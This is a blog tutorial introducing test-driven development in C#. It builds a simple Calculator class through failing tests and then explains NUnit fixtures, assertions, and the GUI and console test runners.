Python's standard library just doesn't have the breadth of Java's. For small apps, the CPython VM is lighter than Sun's JVM, but CPython's VM is lacking several capabilities that I'd consider pretty essential -- chief among them is the ability to return unused memory back to the OS [evanjones.ca]. And for many tasks, CPython is still effectively single-threaded due to its global interpreter lock [python.org]. Java has never suffered from either of these problems. These aren't trivial issues or the result of nitpicking -- they're rather severe limits (which make me seriously question the suitably of Python for enterprise apps, eg. Zope). Of course, once CPython does get decent threading, it's likely that it's GC subsystem will need to be totally rewritten. I apologize if it sounds like I'm beating up on Python. That's not my intent here. I love Python, and I only wish I could stop more people from using Perl
:)
In fairness, it does look like the Python community is trying to address some of these problems. I just read a paper presented last week at PyCon 2005 [python.org] on CPython's memory management. The author is developing some patches to let CPython return unused memory to the OS [python.org] for most object types (except for Number, List and Dictionary). The memory manager still can't defragment its heap, so this isn't a perfect solution. As of a few weeks ago [python.org] it looks like these patches haven't yet been accepted.
Re:Python still has severe limits (Score:3, Insightful)
The memory is only available to other programs after the program exits.
As a result of this, most daemons will re-exec themselves to free up memory for the rest of the system.
At least, that's what I've always heard. Maybe newer versions of the linux kernel are much smarter...
Kill the GIL (Global Interpreter Lock) (Score:5, Interesting)
You see Python has quite good support for threads, but there are a number of operations in the interpreter that are hacked into being thread safe by providing a global lock on the whole interpreter. One of them is reference counts on objects. So everytime I do an assignment, I have to queue for the GIL. This effectively means that I only really run one thread at a time, even if I have multiple CPUs in the box (or soon, multiple cores).
As more and more applications start shifting to multicpu (or multicore boxes) this problem becomes a much more noticable issue.
Kill the GIL.
Available libraries (Score:3, Insightful)
Its main two faults in my mind are:
1. Speed (but this is being worked on, see the Parrot JIT compiler)
2. Memory usage. wxPython especially is an excellent toolkit but a memory HOG.
As far as Java goes, I don't particularly like Java all that much, but one area where it has a definite advantage over Python at the moment is libraries. Not just the standard library, but what add-on libraries are available. Python has a lot, but Java has pretty much everything and the kitchen sink.
For example, I recently worked on a project that needed to display and manipulate SVG graphics. The two requirements are that it be cross-platform, and be done quickly (in just a couple weeks). I originally wanted to use Python but was unable to find a cross-platform SVG rendering library for Python. I came across the Apache Batik [apache.org] toolkit for Java and found that it was exactly what I needed.
Batik is pretty sweet -- you get a swing component that you can plop into an app in about 10 lines of code and boom -- you have one of the most compliant SVG renderers that I've seen to date. Plus it even gives you a DOM interface that will update the graphical view in real-time. As much as I dislike Java in general (even more bloated than Python
Re:before RTFA (Score:2)
Support (Score:2)
Re:Python *is* painful (Score:5, Insightful)
The old K&R style of doing: versus: this is NASTY in the debates it causes and wars people fight over which is 'right' or 'easier'. For those who don't know, Python doesn't use braces, it uses any consistent indent, as in: Very simple. Reduces line count by 1 or 2 and completely removes the religious debate about brace location. I really like this. There's enough problems debating what the code header/copyright/IDENTIFICATION DIVISION (grin) section's going to look like. "I like #####!" "No, I like #-------!!!", "You Suck!" "No, You Suck!" etc.
Don't knock the lack of braces until you try it. it really does make the code look cleaner.
--Kevin
Re:Python *is* painful (Score:5, Insightful)
And who cares about the programmers discussing brace placing styles? They'll surely find other things to discuss about with Python...
Re:Python *is* painful (Score:3, Informative)
Whitespace [dur.ac.uk]
Re:Toenails (Score:4, Insightful)
Ruby will give you dynamic typing without all of the whitespace issues. Given that the two languages compete in (mostly) the same space, why should I go with Python if I don't like it's whitespace issues?
I've seen many cases where thirty minutes of practice gets rid of the problems people have with the whitespace.
But why do I have to adapt to the tool as opposed to the other way around?
Your reaction is just as the OP predicted.
The truth is that whitepace-delimited blocks can be a source of difficult-to-find bugs. It also makes it quite difficult to easily copy n paste code from one place to another. Add to this that it makes Python a very poor language for templating (embedding in HTML for example) and you start to understand why Ruby on Rails is doing so well.
Re:Toenails (Score:4, Insightful)
Re:Better Python-GIS example (Score:3, Informative)
I meant OpenEV on sourceforge.net [sourceforge.net]
Re:Great... but PLEASE allow 'implicit none'! (Score:3, Insightful)
Re:Perl is run by a Christian. (Score:3, Insightful)
why? why does that matter? why should i care whether Alan Turing was gay? why does it matter what religion or faith Larry Wall may or may not follow? | https://tech.slashdot.org/story/05/04/03/0715209/python-moving-into-the-enterprise?sbsrc=thisday | CC-MAIN-2016-40 | refinedweb | 8,550 | 63.09 |
Before we look any further at the CLR metadata, we need a quick diversion to understand how the metadata is actually stored.
Encoding table information
As an example, we’ll have a look at a row in the
TypeDef table. According to the spec, each
TypeDef consists of the following:
- Flags specifying various properties of the class, including visibility.
- The name of the type.
- The namespace of the type.
- What type this type extends.
- The field list of this type.
- The method list of this type.
How is all this data actually represented?
Offset & RID encoding
Most assemblies don’t need to use a 4 byte value to specify heap offsets and RIDs everywhere, however we can’t hard-code every offset and RID to be 2 bytes long as there could conceivably be more than 65535 items in a heap or more than 65535 fields or types defined in an assembly.
So heap offsets and RIDs are only represented in the full 4 bytes if it is required; in the header information at the top of the
#~ stream are 3 bits indicating if the
#Strings,
#GUID, or
#Blob heaps use 2 or 4 bytes (the
#US stream is not accessed from metadata), and the rowcount of each table. If the rowcount for a particular table is greater than 65535 then all RIDs referencing that table throughout the metadata use 4 bytes, else only 2 bytes are used.
Coded tokens
Not every field in a table row references a single predefined table. For example, in the
TypeDef extends field, a type can extend another
TypeDef (a type in the same assembly), a
TypeRef (a type in a different assembly), or a
TypeSpec (an instantiation of a generic type). A token would have to be used to let us specify the table along with the RID. Tokens are always 4 bytes long; again, this is rather wasteful of space. Cutting the RID down to 2 bytes would make each token 3 bytes long, which isn’t really an optimum size for computers to read from memory or disk.
However, every use of a token in the metadata tables can only point to a limited subset of the metadata tables. For the extends field, we only need to be able to specify one of 3 tables, which we can do using 2 bits:
- 0x0:
TypeDef
- 0x1:
TypeRef
- 0x2:
TypeSpec
We could therefore compress the 4-byte token that would otherwise be needed into a coded token of type
TypeDefOrRef. For each type of coded token, the least significant bits encode the table the token points to, and the rest of the bits encode the RID within that table. We can work out whether each type of coded token needs 2 or 4 bytes to represent it by working out whether the maximum RID of every table that the coded token type can point to will fit in the space available.
The space available for the RID depends on the type of coded token; a
TypeOrMethodDef coded token only needs 1 bit to specify the table, leaving 15 bits available for the RID before a 4-byte representation is needed, whereas a
HasCustomAttribute coded token can point to one of 18 different tables, and so needs 5 bits to specify the table, only leaving 11 bits for the RID before 4 bytes are needed to represent that coded token type.
For example, a 2-byte
TypeDefOrRef coded token with the value 0x0321 has the following bit pattern:
The first two bits specify the table –
TypeRef; the other bits specify the RID. Because we’ve used the first two bits, we’ve got to shift everything along two bits:
This gives us a RID of 0xc8. If any one of the
TypeDef,
TypeRef or
TypeSpec tables had more than 16383 rows (2^14 – 1), then 4 bytes would need to be used to represent all
TypeDefOrRef coded tokens throughout the metadata tables.
Lists
The third representation we need to consider is 1-to-many references; each
TypeDef refers to a list of
FieldDef and
MethodDef belonging to that type. If we were to specify every
FieldDef and
MethodDef individually then each
TypeDef would be very large and a variable size, which isn’t ideal.
There is a way of specifying a list of references without explicitly specifying every item; if we order the
MethodDef and
FieldDef tables by the owning type, then the field list and method list in a
TypeDef only have to be a single RID pointing at the first
FieldDef or
MethodDef belonging to that type; the end of the list can be inferred by the field list and method list RIDs of the next row in the
TypeDef table.
Going back to the
TypeDef
If we have a look back at the definition of a
TypeDef, we end up with the following reprensentation for each row:
- Flags – always 4 bytes
- Name – a
#Stringsheap offset.
- Namespace – a
#Stringsheap offset.
- Extends – a
TypeDefOrRefcoded token.
- FieldList – a single RID to the
FieldDeftable.
- MethodList – a single RID to the
MethodDeftable.
So, depending on the number of entries in the heaps and tables within the assembly, the rows in the
TypeDef table can be as small as 14 bytes, or as large as 24 bytes.
Now we’ve had a look at how information is encoded within the metadata tables, in the next post we can see how they are arranged on disk.
Load comments | https://www.red-gate.com/simple-talk/blogs/anatomy-of-a-net-assembly-clr-metadata-2/ | CC-MAIN-2020-29 | refinedweb | 910 | 62.41 |
AstCycleTest is based on the successor information of SgNodes (the same information that is used by the traversals).
It tests such that it allows a preorder traversal to revisit nodes but reports an error if the traversal would run into a cycle. If a cycle is found it reports the list of SgNodes that are part of the cycle to stdout, starting with "CYCLE FOUND: ..." and stops testing. Usage: AstCycleTest t; t.traverse(SgNode* n); // where n is the root node of the subtree to be tested.
Definition at line 35 of file AstTraversal.h.
#include <AstTraversal.h>
determines whether the given sequence l of nodes extended by node creates a cycle the found cycle is returned.
If no cycle is found, the returned list is empty.
In case of a cycle the traversal does not continue to prevent an infinite recursion of the traversal.
Reimplemented from AstPrePostOrderTraversal. | http://rosecompiler.org/ROSE_HTML_Reference/classAstCycleTest.html | CC-MAIN-2018-05 | refinedweb | 148 | 58.18 |
Abstract interface to write data into an ntuple
The page sink takes the list of columns and afterwards a series of page commits and cluster commits. The user is responsible to commit clusters at a consistent point, i.e. when all pages corresponding to data up to the given entry number are committed.
Definition at line 102 of file RPageStorage.hxx.
#include <ROOT/RPageStorage.hxx>
Definition at line 88 of file RPageStorage.cxx.
Definition at line 93 104 of file RPageStorage.cxx.
Finalize the current cluster and create a new one for the following data.
Definition at line 161 of file RPageStorage.cxx.
Finalize the current cluster and the entrire data set.
Definition at line 142 of file RPageStorage.hxx.
Write a page to the storage. The column must have been added before.
Definition at line 148 of file RPageStorage.cxx.
Guess the concrete derived page source from the file name (location)
Definition at line 97 of file RPageStorage.cxx.
Physically creates the storage container to hold the ntuple (e.g., a keys a TFile or an S3 bucket) To do so, Create() calls CreateImpl() after updating the descriptor.
Create() associates column handles to the columns referenced by the model
Definition at line 112 of file RPageStorage.cxx.
Whether the concrete implementation is a sink or a source.
Implements ROOT::Experimental::Detail::RPageStorage.
Definition at line 129 of file RPageStorage.hxx.
Get a new, empty page for the given column that can be filled with up to nElements.
If nElements is zero, the page sink picks an appropriate size.
Implemented in ROOT::Experimental::Detail::RPageSinkFile.
Definition at line 116 of file RPageStorage.hxx.
Definition at line 110 of file RPageStorage.hxx.
Definition at line 109 of file RPageStorage.hxx.
Building the ntuple descriptor while writing is done in the same way for all the storage sink implementations.
Field, column, cluster ids and page indexes per cluster are issued sequentially starting with 0
Definition at line 108 of file RPageStorage.hxx.
Keeps track of the number of elements in the currently open cluster. Indexed by column id.
Definition at line 113 of file RPageStorage.hxx.
Keeps track of the written pages in the currently open cluster. Indexed by column id.
Definition at line 115 of file RPageStorage.hxx.
Definition at line 104 of file RPageStorage.hxx.
Definition at line 111 of file RPageStorage.hxx. | https://root.cern.ch/doc/master/classROOT_1_1Experimental_1_1Detail_1_1RPageSink.html | CC-MAIN-2020-24 | refinedweb | 393 | 60.82 |
Computer vision is a domain thats under active research, with applications spreading across a spectrum of fields such as robotics, human computer interaction (HCI), etc. Computer vision involves tasks such as image reception, processing, reasoning, video stream handling, etc. These tasks involve a lot of mathematical processing, which is not easy to implement. To handle this problem and make the life of the developer simpler, frameworks like SimpleCV become handy.
SimpleCV
SimpleCV is an open source framework for performing computer vision tasks. And like its name suggests, it has made computer vision simple. The complexities associated with OpenCV have been taken care of in SimpleCV by providing direct-to-use functions for performing repeatedly used computer vision tasks. SimpleCV is written in Python and can be installed in all major operating systems such as Linux, Windows and Mac. It is available with the BSD licence.
SimpleCV allows developers to handle both images and videos. The source image/video is acquired directly using various input sources as listed below:
- Web cams
- Kinects
- FireWire and IP cameras
- Mobile phone cameras
SimpleCV facilitates not only making changes to the images but also allows them to be understood.
Installation
SimpleCV can be installed on all major operating systems. As it makes the computer vision code simple by providing a wrapper over existing libraries, it has many dependencies. Hence, during installation, all those dependencies need to be taken care of for making SimpleCV ready to run. The process of installation varies in different operating systems. The dependencies for SimpleCV are shown in Figure 1.
If you prefer to install SimpleCV in Ubuntu, use the following commands:
sudo apt-get install ipython python-opencv python-scipy python-numpy python-pygame python-setuptools python-pip sudo pip install
Once the installation has been successfully completed, run simplecv from the console.
For Windows operating systems, there are two different ways of installing SimpleCV. One method is to download the Windows Superpack from . This super pack includes all the dependencies required for SimpleCV installation.
However, if your system already has some of the dependencies and you want to keep them as they are, then individual components can be downloaded separately, as shown below:
1. Download and install Python 2.7 using
2. The Python set-up tools for Windows can be downloaded from
3. Installation of the SciPy super pack can be carried out using
4. Installation of the NumPy super pack can be done by using
5. Installation of Pygame for Windows can be done using
6. Installation and configuration of OpenCV can be done by using
After the downloading has been completed, execute the .exe file and extract to the folder C:\OpenCV2.3\. It can be extracted to any other folder too, but the environment paths are to be set accordingly.
After the installation is over, set the PATH variables accordingly, as shown below:
SETX PATH C:/Python27/;C:/Python27/Scripts/;C:/OpenCV2.3/opencv/build/x86/vc10/bin/;%PATH% SETX PYTHONPATH C:/OpenCV2.3/opencv/build/python/2.7/;%PYTHONPATH%
To update the path variables, it is required that you close the current command prompt and reopen it. Then execute the following commands:
easy_installpyreadline easy_install PIL easy_installcython easy_install pip pip install ipython pip install
After the successful installation by executing the above commands, type simplcv from the command prompt at the installation folder, to open the simplecv shell. Otherwise, you may click on the SimpleCV icon on the desktop.
SimpleCV shell
The SimpleCV shell allows us to execute the commands and get the results in an interactive manner. Some of the shell interaction commands are as listed in Table 1.
The SimpleCV console is shown in Figure 2.
SimpleCV incorporates a detailed and elegant help system. The help on any of the components/libraries can be retrieved by using the Help command. An example of a command and its output is listed below:
SimpleCV:1> help(Image)
The successful response for the above command would be:
Help on class Image in module SimpleCV.ImageClass: class Image | **SUMMARY** | The Image class is the heart of SimpleCV and allows you to convert to and | from a number of source types with ease. It also has intelligent buffer | management, so that modified copies of the Image required for algorithms | such as edge detection, etc can be cached and reused when appropriate. | | Images are converted into 8-bit, 3-channel images in RGB colorspace. It will | automatically handle conversion from other representations into this | standard format. If dimensions are passed, an empty image is created. | | **EXAMPLE** | | >>>i = Image(/path/to/image.png) | >>>i = Camera().getImage() | | You can also just load the SimpleCV logo using: | | >>>img = Image(simplecv) | >>>img = Image(logo) | | Or you can load an image from a URL: | | much more here ...
A detailed tutorial on interactive shells is provided at
SimpleCV HelloWorld
As stated in the beginning of this article, the core idea of SimpleCV is to make machine vision simple. A HelloWorld example is shown below:
from SimpleCV import Camera # Initialize the camera cam = Camera() # Loop to continuously get images while True: # Get Image from camera img = cam.getImage() # Make image black and white img = img.binarize() # Draw the text Hello World on image img.drawText(Hello World OSFY !!!) # Show the image img.show()
As can be observed from the code sample, SimpleCV provides direct functions for performing the vision tasks. The first step is to get the image source from a camera, which can be done using the cam.getImage(). To convert into black and white, the direct function img.binarize() should be used. Similarly, drawing the text also can be carried out using the simple method img.drawText(). The output image can be displayed using img.show().
SimpleCV provides mechanisms to capture the live camera feed using simple methods as shown below:
from SimpleCV import Camera cam = Camera() cam.live()
An example of machine learning
Apart from performing the simple image manipulation tasks as shown in the HelloWorld example, it allows us to perform comparatively advanced tasks such as image classification. The classification is based on the machine learning. A sample code for performing classification is available at the official code repository of SimpleCV (). This example classifies the given image into Nuts and Bolts with Scikits-learn liberary. The image features such as area, height and width are extracted from the imges for the classification purpose:
SimpleCV Blob handling
Blobs are regions of similar pixels. Blobs are used to detect items of interest in the image. Once the blobs are identified, many operations shall be performed as shown in Figure 3.
A simple code for blob handling is as shown below:
from SimpleCV import Image coins = Image(coins.png) binCoins = coins.binarize() blobs = binCoins.findBlobs() blobs.show(width=8)
After binarizing the image, the blobs are identified by directly applying the function .findBlobs(). The example program loads an image with coins in it. The findBlobs is used to identify the pixels representing the coins leaving the background pixels. The screenshot of the input and output images for the blob detection are as shown in Figure 4.
Motion Detection Example
Motion detection is an important task in many machine vision applications. SimpleCV allows the developer to perform the motion detection task using less than ten lines of code as shown below:
from SimpleCV import * cam = Camera() threshold = 5.0 # setting an adjustable threshold for motion detection while True: previous = cam.getImage() #get the current image time.sleep(0.5) #pause for half a second. The 0.5 can be adjusted current = cam.getImage() #get another image diff = current previous # compute the image difference matrix = diff.getNumpy() mean = matrix.mean() diff.show() if mean >= threshold: print Some Movements Detected
As it can be observed from the aforementioned code, the motion detection is carried out by subtracting the current image from the snapshot taken half a second ago. The SimpleCV facilitates direct subtraction of these image shots as shown in the code.
A detailed capability demo of SimpleCV is available at. In Summary, SimpleCV really makes the Vision computing easy by providing a wide collection of methods. As it is Python based, the seamless integration shall be performed with other useful Python Libraries.
Oct. 19, 2016
SimpleCV.org seems to be inactive.
I am not getting any responses from there.
Does anyone know how to get around the error message:
The ‘IPython.config’ package has been deprecated. You should import from traitlets.config instead.
I am running in Windows 10 and downloaded the SimpleCV package from SimpleCV.org.
I appreciate the long posting by K S Kuppusamy, but I still am unable to run/use SimpleCV.
I uninstalled everything related to python and simplecv, etc. and started from scratch as indicated in the posting. I chose to “download the Windows Superpack from . This super pack includes all the dependencies required for SimpleCV installation.” And installed from the downloaded file SimpleCV-1.3.msi
Then I skipped all the steps involved in installing the ” individual components can be downloaded separately, as shown below:”
It is unclear to me whether I should follow these instructions
” Then execute the following commands:
easy_installpyreadline
easy_install PIL
easy_installcython
easy_install pip
pip install ipython
pip install″
I did not do these and I do not see a SimpleCV icon on my desktop. I do see icons for IDLE (Python GUI) and Python (command line) and they work.
BUT I do not understand how to run SimpleCV using either the IDLE or command window.
I don’t understand this statement: “type simplcv from the command prompt at the installation folder, to open the simplecv shell”. What is the “installation folder”?
How do I get a command prompt at the installation folder?
When I type simplecv.exe in the command window, I am told that the ipython package has been deprecated and to use triatlets.config instead.
I have no idea of how to get the simplecv shell by importing from traitlets.config.
Thanks,
Bob
same issue as bob | https://www.opensourceforu.com/2016/05/simplecv-making-vision-computing-easy-and-effective/ | CC-MAIN-2020-45 | refinedweb | 1,662 | 57.16 |
Development/Tasks/Packaging/Policies/Library
From Mandriva Community Wiki
In order to enjoy better upgrades, it is important to keep old major library versions in the system so that programs which use them still work.
Naming Conventions
Libraries in /usr/lib and /lib must be separately packaged, in a library-only package, named with the name of the main library concatenated with the major of the library (or soname, see below). These packages should not contain any binaries, which should be in a different package. The goal is to be able to install libfoo1 and libfoo2 on the same system.
First of all, it is fundamental that the source rpms keep the same name without any major number, so that the CVS repository contains only one branch for each package.
When the distribution must have two versions of the same library at the same time (for example, qt1 and qt2), the sources rpms will be separated so that we can include both versions in the distribution as two different, independently maintained packages.
Here's a generic example: the following happens when the library comes with binaries, config files, or anything else that won't fit in the main library package (where only libraries go) nor in the devel package (where headers and devel libraries go (e.g. .so and .a)).
- Source package:
- foo-2.3.4-4mdk.src.rpm
- Binary packages:
- foo-2.3.4-4mdk.arch.rpm
- libfoo2-2.3.4-4mdk.arch.rpm
- libfoo-devel-2.3.4-4mdk.arch.rpm
Naming on x86_64
- Binary packages:
- foo-2.3.4-4mdk.x86_64.rpm
- lib64foo2-2.3.4-4mdk.x86_64.rpm
- lib64foo-devel-2.3.4-4mdk.x86_64.rpm
To handle this complexity, use %mklibname:
%mklibname
The %mklibname macro is used to generate the library package names:
- %mklibname [-d [-s]] name [[api] major]
- -d - generate a name for a devel package
- -s - generate a name for a static package (to be used together with -d)
- name - the library name (note that if the library name is libfoo, you should enter "foo", not "libfoo")
- major - the major number to be appended into the name (this should not be used with -d, except in packages mentioned in special cases below)
- api - if the library has a SONAME like libfoo-1.2.so.4, api should be set to 1.2 and major to 4. This results in libfoo1.2_4
Example usage:
- %mklibname foo 5 => libfoo5
- %mklibname -d foo => libfoo-devel
- %mklibname -d -s foo => libfoo-static-devel
*.la files
- if you have *.a files, put *.a and corresponding *.la files in libfoo-static-devel,
- *.la in non standard directories which are used to ltdl/dlopen plugins should go to libfooX (and not libfoo-devel),
- *.la in standard directories can sometimes be used to ltdl/dlopen shared libraries, in that case those *.la should go to libfooX. You must explain in the spec file which programs are doing so, and a note in libtool archives.
- in the other cases, put *.la in libfoo-devel (we could drop them, but the policy is not decided yet)
cf libtool archives for explanations
Special cases
We described the default policy for library packages, however some special cases can happen and must be handled using the brain:
- Remember to always check the soname of the libraries (objdump -x libfoo.so.1 | grep SONAME), because some sonames include the library version number, for example libfoo-1.2.so.4. In this case, the package should be named libfoo1.2_4-1.2.4-3mdk.
- Packages ending with a number should be handled by putting a "_" before the major, for example libfoo23_4-1.2-3mdk (in this case the soname would be libfoo23.so.4).
- It is not necessary to split each library in separate packages: if a package contains several libraries, the name would be built from the main library of the package. If there are problems keeping libraries in the same package (e.g. their major may differ), the package should be split.
- When splitting libraries which were previously in a single package, you may need to add Obsoletes/Conflicts "across" the new packages, to hint Urpmi into putting them in the same transaction (ref: libiptc and libiptables splitting)
- If multiple versions of the package are maintained within the distro with different majors, or an expected future release is going to be source-incompatible in a major way (rebuild of concerned pkgs not being enough, and changes required are too big) with the current version (e.g. QT3/QT4/QT5), the devel package name should include the major. In the former case, the devel subpackage of the newest version should generally not contain the major, only the older versions.
Updating a package which is following the old library policy
Change the name of devel packages from %libname-devel to "%mklibname %name -d" (without %major! though usually with %api if present) as seen above and add an Obsoletes for the previous name ("%mklibname %name 2 -d" or "%{_lib}%{name}2-devel", 2 being the major of the obsoleted devel package). Static-devel packages have to be switched to use %mklibname %name -d -s. If in doubt, do not hesitate to ask in cooker mailinglist.
Provides and conflicts
At least %name-devel = %version-%release should be provided by the -devel package. If the original tarball name differs from %name, you should also provide tarballname-devel = %version-%release, for compatibility with other RPM-based systems. If multiple versions of the library are maintained within the distro, only the latest shall provide %name-devel. The older versions provided should provide %name%major-devel or %name%api-devel where applicable. The maintainer may also opt to provide %name%major-devel or %name%api-devel in the newest package as well, if the next major number raise is excepted to break source-compatibility (see the Special cases above).
It's important to understand that putting a Provides without the version information makes it impossible for later client RPM's to put a version information on dependencies, e.g. "Provides: foo-devel" is NOT enough, please use "Provides: foo-devel = 1.2.4-3mdk".
If multiple versions of the library are maintained within the distro and the exception allowing the use of major in lib -devel package name is used, you have to add conflicts with the other devel package if they are not parallel installable. (this is often the case when the major changed, without renaming the headers).
Adding an old-majored version into the distro
If a package is upgraded to have a new major, and it will be noticed that it is not source-compatible with the previous release and the users of the library cannot be straight-forwardly patched to use the new API, the older library should be maintained in parallel with the new one. The creation process follows with the example package "foo", just upgraded to major 3:
- SVN copy package "foo" from just before the major 3 update to package "foo2". Also change the Name to "foo2" and rename the spec file to foo2.spec.
- Add 2 (the major) to the devel package name, i.e. libfoo2-devel instead of libfoo-devel. This can be achieved by adding the parameter %major into the %mklibname call of %develname.
- Modify any provides so that they have the major number in them. E.g. %name-devel or foo%major-devel is fine.
- Add Conflicts: foo-devel if the package conflicts with the newer devel package.
No changes are needed in the .spec of the newer version.
An example
Here's an example of a specfile for a package with no binary and config files, so only library binary packages are needed. (Note that the spec file is not valid, it is only an example that shows how it works and to highlight the difference with a normal package.
%define name gtkmm %define version 1.2.4 %define rel 1 # api is the part of the library name before the .so %define api 1.2 # major is the part of the library name after the .so %define major 1 %define libname %mklibname %{name} %{api} %{major} %define develname %mklibname %{name} -d Name: %{name} #(!) summary for SRPM only Summary: C++ interface for popular GUI library gtk+ Version: %{version} Release: %mkrel %rel %description #Full and generic description of the whole package. (this will be the SRPM #description only) #main package (contains .so.[major]. only) %package -n %{libname} #(!) summary for main lib RPM only Summary: Main library for gtkmm Group: System/Libraries Provides: %{name} = %{version}-%{release} %description -n %{libname} This package contains the library needed to run programs dynamically linked with gtkmm. %package -n %{develname} Summary: Headers for developing programs that will use Gtk-- Group: Development/GNOME and GTK+ Requires: %{libname} = %{version} #(!) MANDATORY Provides: %{name}-devel = %{version}-%{release} %description -n %{develname} This package contains the headers that programmers will need to develop applications which will use Gtk--, the C++ interface to the GTK+ (the Gimp ToolKit) GUI library. %if %{mdkversion} <= 200900 %post -n %{libname} -p /sbin/ldconfig %postun -n %{libname} -p /sbin/ldconfig %endif %files -n %{libname} # .. # include the major number (and api if present) in the file list to catch changes on version upgrade %{_libdir}/lib-%{api}.so.%{major}* %files -n %{develname} # .. %{multiarch_bindir}/gtkmm-config %{_bindir}/gtkmm-config %{_includedir}/*.h %{_libdir}/*.so
More information on the library system in Linux can be found at. | http://wiki.mandriva.com/en/Policies/Library | crawl-002 | refinedweb | 1,561 | 52.9 |
Unit Testing, Agile Development, Architecture, Team System & .NET - By Roy Osherove
Ads Via DevMavens XP.:
1. Make a test that fails
2. Make it work. To show just how easy this is, let’s make a pretend project.
Our first task in the project is to create a class named Calculator that contains a method that adds two numbers. Now, given what I’ve just explained, the first task would be to first have one test that fails. So let’s create a new Console Application project. This project will be our testing project. It’s not the real project that we have to do. This project will contain the code that tests our production code.
In our Main() method let’s add a few lines of code that determine whether out code (which does not exist yet) runs ok.
The first thing we want to do is test that we can create a new instance of our calculator class:
[STAThread]
static void Main(string[] args)
{
Calculator calc = new Calculator();
}
Now, of course this code won’t compile, but what we have just done is created a test that relies on the fact that a class named Calculator exists. So our next step is now to make the test pass . To do that we’ll finally create our “real” project and add a class named calculator to it. Once we add a reference to that project into out test project, we’ll see that the code compiles and runs just fine. We just made the test pass.
Our next goal? Add an “AddNumbers()” method that takes two numbers and returns the sum of those numbers. Again, what’s the first thing we do? That’s right. We create a test that fails. So let’s add code to test this to our previous test code:
[STAThread]
static void Main(string[] args)
{
//test creation
Calculator calc = new Calculator();
//test addition
int retVal = calc.Add(22,20);
if(42!= retVal)
{
throw new Exception("calc.Add(2,2) did not return a value of 4");
}
}
That was simple. Again, this code won’t compile. We have to create the code that does this addition operation. Once we’ve added a simple method for Add() we can now re-run the test and make sure that it works. Let’s make this a little more interesting though. What happens when we send in a null value in one of the parameters? Suppose that the design requires us to throw a CalcException when a null value is sent to this Add() method. If want to add this feature, we first need to test for it:
//test exception
try
int retVal = calc.Add(null,22);
catch(CalcException ce)
//test passed
catch(Exception e)
throw new Exception("calc.Add(null,22) did not throw a calcException");
Now the code won’t compile again, We don’t have a CalcException class defined. Once we define it, we can run the test, but it will fail again, since we’ll get a standard exception and not a calcException from the AddMethod. So we’ll change our code to throw that exception…. And so on…
As you can see this process is pretty easy. What I’ve done at every step is define a goal, and than make sure I pass it. What we have achieved at the end of this session is a piece of code that is thoroughly tested. Not only that, we get several added bonuses:
· Anyone who looks at our tests can understand what out intention and purpose is of each method
· We can make changes to our code and know “what we broke” with the click of a mouse and fix it just as fast
· If our testing covered all of our code like this, we could find bugs in our programs at build time that would have taken a very long time at the customer’s site
But some things are definitely missing from our current solution:
· No automation. If I wanted to run a build and get the results of the tests that were performed I’d have a long day coming up with a solution that traces the messages and output them.
· No re-use. I’d have to re-write any output handling from scratch every time I want to test a project
· No decoupling. Code that runs a test must be totally decoupled from other code that runs a test. I always want my testing code to run within a given context, a known set of known values for parameters and so on. I don’t want other tests messing up my state when they change stuff. There’s no framework that allows me to have a separate state for each testing code without significant work every time.
NUnit
What’s needed here is a framework that allows us to write tests and not worry too much about how we’re going to get back their results. The de-facto framework for .Net unit testing is NUnit. Currently at version 2.1, NUnit provides us with a set of base classes and attributes that allow us to abstract away our unit tests and concentrate on the code that actually does the testing. The beautiful thing is that moving from our current coding/testing style to Nunit style requires little learning and is very easy to master.
Nunit allows us to separate out testing code into what is logically know as tests, test fixtures and test suites. The concept is very simple.
· You write a test to test a single piece of functionality.
· You group one or more tests inside a test fixture that allows you to easily add repeatable state for each test (I’ll explain shortly)
· You group one or more fixtures inside test suites to logically separate the test and their meaning
So how do we turn our code into using Nunit style?
· Download and install Nunit
· Add a reference to the nunit.framework.dll to our testing project
· Add a using clause for NUnit.Framework workspace in a new class file
Now we’re ready to start working.
Change the class’s name to MyTestingClass .
This class will hold the fixture for our tests. We also need to let the Nunit framework know that this class is a fixture, so we simple add a [TestFixture] attribute on top of the class name. You can remove the default constructor from the class (but don’t make it private!). Once we’ve done that, we have a class that looks like this:
[TestFixture]
public class MyTestClass
Easy enough we just have to start adding tests to the class. We’ll use the code from our previous example to test against Calculator.
A test in a fixture is defined as a public method that returns void and accepts no parameters, marked with the “[Test]” attribute and with one or more assertions inside. So let’s add the first test.:
[TestFixture]
public class MyTestClass
[Test]
TestAddition()
{
//test addition
int retVal = calc.Add(22,22);
Assert.AreEqual(44,retVal,
"calc.Add() returned the wrong number");
As you can see it’s the same code as before only now it’s sitting in a method of its own .The method is decorated with the [Test] attribute .Also, instead of having to manually throw an exception I’m using the Assert class which is part of the Nunit framework. You’ll get to know this class a lot as this is the main instrument you’ll use to verify your code. The Assert class will fail the current test if the condition passed to it is false. It contains only static methods that allows you to make sure that a value is not null, equals other values and just send in any Boolean expression you like. You can also send in messages that explain the meaning of this failure.
Now we need to build our testing project so we can move on to the next step.
Test suites
Test suites in the new versions of Nunit are derived directly from the namespaces that the test fixtures reside in. If you have two fixtures in separate namespaces (i.e. one is not contained inside the other) they’ll be considered as residing in two separate test suites.
So what now?
GUI
Well, now it’s time to run your first Nunit test. When you install Nunit you get two choices on how to run your unit tests: Either a GUI based version of the Nunit test runner, or a console based one. The Gui one is located in Start->Programs->Nunit V2.1->Nunit-Gui . When you open it you get a pretty “not beautiful” but very functional interface that allows you to select an assembly with compiled unit tests inside it and run all the tests that are there.
· Select File->New project
· Select Project->Add assembly and select your compiled tests assembly.
Once you’ve selected your assembly you’ll see the tree on the left fill up with namespaces, with the names of any test fixtures inside them and the names of any tests inside them. Now you can see why it’s important to put those attributes on our classes and tests. It’s how we make out testing GUI find them and run them.
Make sure the top node of the tree is selected and click “Run” on the right side of the form. You see the progress bar very quickly turn green to signify success. If the bar is red, it means that test has failed and you can go back and make it succeed.
I won’t go into too much detail here on how to use all the features in the Nunit GUI but you can learn all you need by reading the documentation for it.
Feel free to close the GUI, it will remember the last assembly you loaded in it next time.
On important thing to note here is that once one test inside a test suite fails, all other tests will not run.
Console
Besides the GUI version of the Nunit test runner, you also get a Console test runner. This is especially good for when you have an automated build procedure that runs unattended. You can make it call the console version of Nunit which outputs directly into the stdOutput and have it log all results.
To make the console do the testing, you need to switch to [Nunit program files folder]\Bin . From there you can run Nunit-Console.exe providing the name or full path of the assembly to test against. I urge you to put that path inside the global PATH environment variable so that you can use the console easily from anywhere.
More testing goodies we get
